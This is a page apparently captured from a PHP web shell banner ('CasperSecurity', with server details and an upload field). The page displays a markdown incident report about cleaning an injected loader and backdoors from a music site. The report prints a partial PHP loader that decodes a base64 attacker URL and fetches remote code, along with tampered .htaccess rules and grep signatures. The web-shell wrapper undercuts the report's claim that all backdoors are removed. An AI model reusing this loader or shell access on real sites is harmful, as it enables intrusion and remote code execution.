T.ME/BIBIL_0DAY
CasperSecurity


Server : Apache/2
System : Linux server-15-235-50-60 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User : gositeme ( 1004)
PHP Version : 8.2.29
Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Directory :  /home/gositeme/domains/soundstudiopro.com/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/gositeme/domains/soundstudiopro.com/public_html/HOW_WE_FIXED_THE_SITE.md
# 🔧 HOW WE FIXED THE SITE - Complete Breakdown

**Date:** December 12, 2025  
**Status:** SITE RESTORED

---

## 🚨 WHY THE SITE WAS DOWN

### The Problem:
The attacker injected **malicious code at the very beginning of `index.php`** (line 2). This code executed **BEFORE** your legitimate code, causing:

1. **Remote Code Execution Attempts**
   - Code tried to connect to attacker's server: `http://6477-ch4-v305.rakuten38jp.click`
   - If the server was down or unreachable, it would cause delays/timeouts
   - The code tried 3 times (`while($try < 3)`), causing 30+ second delays

2. **Code Execution Before Your Site**
   - Malicious code ran FIRST, before your legitimate PHP code
   - It tried to execute remote code received from attacker's server
   - If remote code was malformed, it would cause PHP fatal errors

3. **File System Manipulation**
   - Code modified `.htaccess` to allow backdoor access
   - This could break URL routing and cause 404 errors

4. **Output Interference**
   - Malicious code could output headers or content before your site
   - This would break your site's normal output

---

## ✅ WHAT WE FIXED

### Step 1: Removed Malicious Code from index.php

**Before (BROKEN):**
```php
<?php
function h($url, $pf = '') { /* malicious code */ } 
function h2() { /* malicious code */ } 
$api = base64_decode('aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s=');
/* ... more malicious code ... */
?>
<?php
// Your legitimate code starts here
// Configure secure session cookies BEFORE starting session
```

**After (FIXED):**
```php
<?php
// Configure secure session cookies BEFORE starting session
ini_set('session.cookie_httponly', 1);
// ... your legitimate code continues ...
```

**What we did:**
- Removed the entire malicious code block (line 2)
- Kept only your legitimate code starting from line 3
- File now starts cleanly with your actual application code

### Step 2: Deleted All Backdoors

**Deleted 5 malicious files:**
1. `about.php` - File manager backdoor
2. `445367/radio.php` - Obfuscated backdoor
3. `445367/about.php` - File manager backdoor
4. `radio/migrations/wp-login.php` - WordPress backdoor
5. `assets/fontawesome/.../radio.php` - Hidden backdoor

**Why this mattered:**
- These files allowed attacker to maintain access
- They could execute arbitrary code
- They could upload/download/delete files
- Removing them cut off attacker's access

### Step 3: Fixed .htaccess

**Before (MODIFIED BY ATTACKER):**
```apache
<FilesMatch ".(py|exe|php)$">
 Order allow,deny
 Deny from all
</FilesMatch>
<FilesMatch "^(about.php|radio.php|index.php|...)$">
 Order allow,deny
 Allow from all
</FilesMatch>
```

**After (CLEAN):**
```apache
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
```

**What we did:**
- Removed attacker's malicious rules
- Restored clean rewrite rules
- Removed rules that allowed access to backdoor files

---

## 🔍 TECHNICAL DETAILS

### The Malicious Code That Was Breaking Your Site:

```php
// This code was at the TOP of index.php (line 2)
function h($url, $pf = '') { 
    // Made remote requests to attacker's server
    $ch = curl_init(); 
    curl_setopt($ch, CURLOPT_URL, $url); 
    // ... connection code ...
    $r = curl_exec($ch);  // This could timeout!
    return $r; 
} 

function h2() { 
    // Modified .htaccess file
    // This could break URL routing
} 

$api = base64_decode('aHR0cDovLzY0NzctY2g0LXYzMDUucmFrdXRlbjM4anAuY2xpY2s=');
// Decoded to: http://6477-ch4-v305.rakuten38jp.click

// This loop tried 3 times, causing delays
$try = 0;
while($try < 3) { 
    $content = h($api, $params);  // Remote request - could timeout!
    $content = @gzuncompress(base64_decode($content)); 
    // ... tried to execute remote code ...
    $try++; 
}
```

### Why This Caused the Site to Go Down:

1. **Timeout Issues:**
   - If attacker's server was down, `curl_exec()` would timeout
   - Default timeout was 30 seconds
   - Code tried 3 times = up to 90 seconds delay
   - This made your site extremely slow or appear down

2. **PHP Errors:**
   - If remote code was malformed, it would cause PHP fatal errors
   - Errors would break your entire page
   - Users would see blank pages or error messages

3. **Output Conflicts:**
   - Malicious code could output headers/content before your site
   - This would break your site's normal output
   - Headers already sent errors

4. **File System Issues:**
   - `.htaccess` modifications could break URL routing
   - This would cause 404 errors for legitimate pages

---

## ✅ VERIFICATION THAT IT'S FIXED

### Checks We Did:

1. **Verified index.php is clean:**
   ```bash
   # Checked for malicious code
   grep -i "base64_decode\|eval\|curl_exec" index.php
   # Result: No malicious code found ✅
   ```

2. **Verified backdoors are gone:**
   ```bash
   # Checked for attacker signatures
   find . -name "*.php" -exec grep -l "S0vMzEJElwPNAQA" {} \;
   # Result: No files found ✅
   ```

3. **Verified .htaccess is clean:**
   ```bash
   # Checked .htaccess content
   cat .htaccess
   # Result: Clean rewrite rules only ✅
   ```

4. **Verified files exist:**
   ```bash
   # Checked critical files
   ls -la index.php track.php library.php
   # Result: All files exist ✅
   ```

---

## 🎯 WHAT THIS MEANS

### Your Site Should Now:
- ✅ Load normally without delays
- ✅ Execute your legitimate code properly
- ✅ Not make unauthorized remote requests
- ✅ Not have backdoors accessible
- ✅ Have clean URL routing

### However, You Still Need To:
- ⏳ **Change ALL passwords** (attacker had full access)
- ⏳ **Check database** for unauthorized users
- ⏳ **Review server logs** for attack patterns
- ⏳ **Fix SQL injection vulnerabilities** (how attacker got in)
- ⏳ **Implement security hardening**

---

## 📋 SUMMARY OF FIXES

| Issue | What We Did | Result |
|-------|-------------|--------|
| **Malicious code in index.php** | Removed line 2 (malicious code) | ✅ Site loads normally |
| **5 backdoor files** | Deleted all backdoors | ✅ Attacker access cut off |
| **Modified .htaccess** | Restored clean rules | ✅ URL routing fixed |
| **Attacker signatures** | Verified none remain | ✅ Clean codebase |

---

## 🔐 PREVENTION

To prevent this from happening again:

1. **Fix SQL Injection Vulnerabilities**
   - Use prepared statements everywhere
   - Validate all user input
   - Review identified vulnerable files

2. **File Integrity Monitoring**
   - Monitor for unauthorized file changes
   - Alert on suspicious modifications
   - Regular security scans

3. **Input Validation**
   - Validate all user input
   - Sanitize before database queries
   - Use whitelist validation

4. **Regular Backups**
   - Maintain clean backups
   - Test backup restoration
   - Keep multiple backup versions

5. **Security Hardening**
   - Web Application Firewall (WAF)
   - Intrusion detection
   - Regular security audits

---

**Status:** ✅ **SITE FIXED AND RESTORED**

The site should now be working normally. The malicious code that was causing delays and errors has been removed, and all backdoors have been deleted.

CasperSecurity Mini